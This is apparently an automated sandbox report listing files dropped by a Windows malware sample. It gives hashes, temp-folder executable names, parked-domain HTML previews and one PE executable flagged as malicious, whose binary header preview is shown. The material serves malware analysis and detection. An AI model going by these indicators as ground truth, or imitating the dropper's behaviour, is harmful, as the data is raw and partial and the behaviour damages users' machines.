                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.651181889423068
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFpFmDMqUtmtE9VC4oZcBx73M7ioaxyi6CVegMTf992wP:6QBUh9VGODSi1yi7ul928
                                                                                                                                                                                                                                  MD5:745EDF4FB8CC3C21A446C7B387BA5C26
                                                                                                                                                                                                                                  SHA1:73E922306210D7F4C1113CDA1F2E32235A3D2A3B
                                                                                                                                                                                                                                  SHA-256:07ABE523B383759E38A286D40B45254CAFDC25D44C9A706901A641FB3322E49F
                                                                                                                                                                                                                                  SHA-512:380B28389D620B317417DA91708EB1B423010D3544F5A05B62334676C54428C6CEA3D400584EF677E5146C9D034EEA2CF32E9BF72C02C8FDF79C4D02E9A4FD79
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzA5Ni43MDU2OjM3NGZkZjRiMTNmYTJjMTZlY2E5Y2FlYjcyMWIxYWU4MmM2ZWJlYzk2MGVjZjI0ODY5NzlhZmQ3ZTViNTk5Yzg6NjcxMjEwNjhhYzQ0ZA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA2OGFjNDIwfHx8MTcyOTIzNzA5

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\pmcv.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.654954590625863
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFMg/okOMqUtmtE9VCWaXcBq3M7ioaxyi6CVyvMTf992wP:tWOUh9Vd7Di1yi7yml928
                                                                                                                                                                                                                                  MD5:9EA1A2C8077843C859DCCA86EC873B61
                                                                                                                                                                                                                                  SHA1:25E681DE8E936CA42866DEC81DBC992FE4B4F6E2
                                                                                                                                                                                                                                  SHA-256:C29A829E5AFE3366E77CF6D20772C7A2D03566A7F4DFBAC86D66C4285072E0DE
                                                                                                                                                                                                                                  SHA-512:21ECFF3C6457878AAC650E4C831F262DFF93FB72CD6ECEA396F48BA70D8EC6001C27BEFA1B38635762EC2C2EA70442AEFD33BB015183B23F079E256AB9DD25B6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzEzNC44NTE2Ojc2YmVhZDAzYzg2N2VhYzkyM2U3OTc5YWE1MjkwZTMyMmNmNTZmMjdlMWRhNzI2MDQ2MGEzZGQwN2UyODA2Yzc6NjcxMjEwOGVjZmViMg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA4ZWNmZTg3fHx8MTcyOTIzNzEz

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\rrco.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.648242834013477
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFOEjhfpMqUtmtE9VCtUcBk3M7ioaxyi6CVqKMTf992wP:ZIzUh9VmnNi1yi7ol928
                                                                                                                                                                                                                                  MD5:E40B5EFFA1AC4F83A6836BC2A6F58FC1
                                                                                                                                                                                                                                  SHA1:F7C2DBF4C53B7E9535C1DC0013DC43ABD91AA854
                                                                                                                                                                                                                                  SHA-256:45912746F933987457D510577A74C87B9194402749DDC68A91388906A7DACA04
                                                                                                                                                                                                                                  SHA-512:53D40D5E3203A26DEB880E165C58B0BB9011E499BDB54076D48B3514ABDFBDD17A59A48D9977BFD3A13EB7E028441E9464B79A437337227282D995F88367BAE3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzEyOS40MjUzOmFhMGY1MjkzNTE2NWJhMWI3MzhkNTFkZTE4NGM5MjVmN2YyZDBiNGNhMDUxMzZlZThjZWY1MGIzMzEwYzE4MmQ6NjcxMjEwODk2N2Q4MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA4OTY3ZDNjfHx8MTcyOTIzNzEy

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\vdbi.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.64139213293994
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF2k2UMqUtmtE9VCi/cBndL3M7ioaxyi6CVGPMTf992wP:tk2gUh9VCtdCi1yi7GGl928
                                                                                                                                                                                                                                  MD5:783FA9FAC79180247F7BEE379940BE4A
                                                                                                                                                                                                                                  SHA1:2728610B19A555D5C0D5685D61903B7586E02C2D
                                                                                                                                                                                                                                  SHA-256:3C37753AB2059DB730CDF5C7342F20FF1229EF497C1186C060580615B962137B
                                                                                                                                                                                                                                  SHA-512:92EF06D098370D7A40EB818788548B8CAFA62C158EF84D1C0B9ED8F9CD703F74F1E4B0F7FB07D208E16E647B88EB8BD6B2A5A180540B798988795D4D090C85A0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzExMy4xMTU5OmYzYjMwYzhlY2MwMzdhMDNjYjhlN2ZlNWQ5MjI5NWU4NDE1YTlmNzk0ZmE3ZjljZWQwMjYzMDA1YWM0NGEyNjk6NjcxMjEwNzkxYzRhNw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA3OTFjNDYyfHx8MTcyOTIzNzEx

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winbwxmuq.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66561
                                                                                                                                                                                                                                  Entropy (8bit):7.972055187583809
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:kyCBW71fQeKxc3xWTGb6gv8tGRC7uon1swHIgjZjHsHk:PCAhIeKxc3xrTOF7ocME
                                                                                                                                                                                                                                  MD5:8A5ACDA760458188753DB2855CE8A647
                                                                                                                                                                                                                                  SHA1:4C94C43E82D444D8F251E64AC01AAF7DD9556D0B
                                                                                                                                                                                                                                  SHA-256:D0B44A40D2E15CD97BDD873A5DD8834212A5779A58DE5A22A8D4DEC37B5C5BD9
                                                                                                                                                                                                                                  SHA-512:3795C6769AF6E0FF75000A9325AA0CD9AD860BA24548EA7F7601122BAD9C68CDF1C318D55D2A8BD3CD2B5357D040A2BF405AC179CB02856B0A20D8046C48CC45
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................?. ................................................................_.n..~..%...S..t=..w....].@UE.U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\wincshuip.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.644485814214793
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFJdylYMqUtmtE9VC98cBL3M7ioaxyi6CVWMMTf992wP:iyl0Uh9Vyv4i1yi7Wtl928
                                                                                                                                                                                                                                  MD5:1B5804DCC3E0E447273A37E386BAB698
                                                                                                                                                                                                                                  SHA1:D8EF2BB5616516C2D593064A4FC85686DDC779B6
                                                                                                                                                                                                                                  SHA-256:F942A52030922B80931DBE84BF5B207C281517F4F54938C723EB3971310C0A1B
                                                                                                                                                                                                                                  SHA-512:52B8195C009A9BFC618BB1F9011700D274F7240D7182021375FDCE17160B588A10583EEADC836F33DAE5826E6477F6CD3EE2703BCDD3C043E8344F8421A340F9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE1Ny4xODQ3OjM4ZDU4NWYzMzZhZjU4OGNjNzdkOGEzM2RiNzg4MTRjYjlkMDNhMjE1Y2ZlZTAwNjhiNzIzNTYwMjNkZTlkYzQ6NjcxMjEwYTUyZDE3NQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBhNTJkMTQ5fHx8MTcyOTIzNzE1

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\windtnq.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.657829036895418
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFS+3MqUtmtE9VCdcBUss3M7ioaxyi6CVNawMTf992wP:rAUh9VpBi1yi7Ngl928
                                                                                                                                                                                                                                  MD5:7E630BF5035BAF8879FB1D888EDDC188
                                                                                                                                                                                                                                  SHA1:4A609F3B178899FB51B8695CD2C1BDECC02B180D
                                                                                                                                                                                                                                  SHA-256:7151F462D424C60A10027D29546BA9A2796CDDC2DFCCC16C9EBD586FF0B34607
                                                                                                                                                                                                                                  SHA-512:29AD185242ACADC54791B1541F8169696A2CCD80F48CB73718EFB0A7F0DB2E98D50EDDB1AC8EEDC6BEF749DA798C2CB32F74D31D61CEE39AD7BBFF74AAF02E9B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE0MC4xNjc6MjI0ZGI4NzNkMjczNjRiMjVlYjc2OTRmMTQ0MzQwODVhMjQ0MDJhYmEzOTJlZGE4ZTA2MzczNzQ0Y2IzYzE0MTo2NzEyMTA5NDI4YzJj';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA5NDI4YmVhfHx8MTcyOTIzNzE0MC4z

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\windxtl.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.6509399844661115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFSFpMqUtmtE9VCEEaDcB9L3M7ioaxyi6CVnMTf992wP:LdUh9VzboGi1yi7el928
                                                                                                                                                                                                                                  MD5:7898CACF217FDCA7D651C95D5B9F037D
                                                                                                                                                                                                                                  SHA1:7D45C12E5805F2E005DBA6502EBA68E91199DD89
                                                                                                                                                                                                                                  SHA-256:03B864DA472902B37773ABF50A22B1F11471161FBD423AA4B96CBB8C0436756E
                                                                                                                                                                                                                                  SHA-512:52997874E7F381CB2B47A03BB3CE4B891E1B698D271BB05B7ECBC97C0C69EC799E622BCE4D6331251B74E19BD60ABE37A9AC60CF288499CE35F96C1029CE5844
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzEwNy43MDU6NzFmNmM3NGY0OGIwYjk2MDMxMTVhMTg3NWFmY2NmNzdmZDJjNjdhNTAxY2QyNTFiOTdlOGE0M2IwMjMzZDk5OTo2NzEyMTA3M2FjMWZm';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA3M2FjMWJkfHx8MTcyOTIzNzEwNy45

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winfbuysn.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.645824350884002
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFGg5f4MqUtmtE9VCUe8cB0PzG3M7ioaxyi6CVYvMTf992wP:/EsUh9VrevaBi1yi7Yml928
                                                                                                                                                                                                                                  MD5:B41E617E5F4CEE9FD15961D97D22040C
                                                                                                                                                                                                                                  SHA1:1211764AFE20632C259E87189262F1F7DF983C54
                                                                                                                                                                                                                                  SHA-256:2CDF399E285B658595439EC99C4A8133D18374F993FA84B96945C77B39574466
                                                                                                                                                                                                                                  SHA-512:E866E2F8A0FE45BB099E7A7081EF31A276C41B2C216BDB4F5C92C02DA973507E899246F95EEA5886E86FE0D9642DEDD1FE05D1DE79187D15187DBF05F27BD824
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzEyMy44ODMyOjc4NWM3OTYxZmFiZGIyMmY2NDgxNWM0YjIyNmJjZDk1MGQ1ZGY0NWJkNjg1NTgzZTgwMjFhNWE0NGI4ZWZkZTQ6NjcxMjEwODNkN2EwMw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA4M2Q3OWMzfHx8MTcyOTIzNzEy

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winftiwuh.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.65897367629714
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpF97rqsMqUtmtE9VCR2fTcB9t3M7ioaxyi6CVI4MMTf992wP:QiIUh9V74H4i1yi7Iml928
                                                                                                                                                                                                                                  MD5:D58F94CA3A28E21BAF476E9D73BDBC47
                                                                                                                                                                                                                                  SHA1:2AA3417744DDDA35B969F48D46E5077E32FF1B75
                                                                                                                                                                                                                                  SHA-256:1312829F5D39BC1DAB591B73DBE83609C171EEAE6CAC9746E850E65E10DDD881
                                                                                                                                                                                                                                  SHA-512:39C2CC7DB984C17727FF8095ECD493C32B0C5B9EC1F77BBECEDE6E48705698892E7AB450FFBE932A743009E897BF71F4802EAF7C5FBDD98C483D141B9D27B430
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE3My4zOTIzOjlkNDA5ZTg1ZjNiMmM0YzhiZWY2N2Q3ODNlMmY5MzIzYTRlYzQ2N2ZjODA0NjFmMjg2Nzc1YmQwZGU4NmJlMWU6NjcxMjEwYjU1ZmM5MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBiNTVmYzYyfHx8MTcyOTIzNzE3

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\wingljcv.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.653747819543308
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFTrZ/MqUtmtE9VCfAcqcBYY9ti3M7ioaxyi6CVGiMTf992wP:cZ9Uh9VqAcNuYti1yi7Gbl928
                                                                                                                                                                                                                                  MD5:BA1BABB1B8DCEE7CD0B3CC6DE441EB38
                                                                                                                                                                                                                                  SHA1:5E8F59877484510E3FAA193F148F3C1A645E92FD
                                                                                                                                                                                                                                  SHA-256:DAC955618A08D6FCCF2085AAD998CFE7A5B1309C6D34BAA4637DD4A6F359CE80
                                                                                                                                                                                                                                  SHA-512:C710F4BC3E2A62CFACADF6729CDA4B703B77EAF3616AA4DE18F5FE8F2CDA0B203A14FA99CF59E79B255D334860640A4A5866070066CAA57AD88DDC70FC2857AC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzE1MS43ODM4OmJlNTJhYzcxZmZmZGMwYTQwMzRlNjAxNGFkZGU2YjNlMTMyOGUyNGRlODBhMmY3ZDQyZTQyMWRjZDg3MDFlMjQ6NjcxMjEwOWZiZjU4ZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTA5ZmJmNTQ3fHx8MTcyOTIzNzE1

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\wingvdx.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                  Size (bytes):2261
                                                                                                                                                                                                                                  Entropy (8bit):5.644234335820176
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+mazpFBUmHMqUtmtE9VCxducBZl3M7ioaxyi6CV/MTf992wP:ZAUh9V8dxwi1yi72l928
                                                                                                                                                                                                                                  MD5:807C9A4FBF59556D7101247E4F422027
                                                                                                                                                                                                                                  SHA1:8565E68C9DDC14796E9FA63D6E8E013B3B16D660
                                                                                                                                                                                                                                  SHA-256:791CF03299117EF1404CD965ECF6F16E3E54B80A949A4F3771AADC09AC47FA37
                                                                                                                                                                                                                                  SHA-512:F557A853792E1DA58E56A57F1093FA27B006B195C5769282D111F11A643021B249BDA35FAF328F1014FE79669E281527D655811FC570ED43F0FED777C561DA83
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTIzNzIxNC42NDQ6MTEyZDZkYjRhYzk3Nzc1MjUyZGMyZTI3Zjk2ZjFmZjBlMDEzODVlNzZiNDkwYjJkMDNlMjFkYzViYzMyMGI1NDo2NzEyMTBkZTlkMzg0';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyMTBkZTlkMzM3fHx8MTcyOTIzNzIxNC44

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\winitfun.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2265
                                                                                                                                                                                                                                  Entropy (8bit):5.642834749027684
                                                                                                                                                                                                                                  Encrypted:false
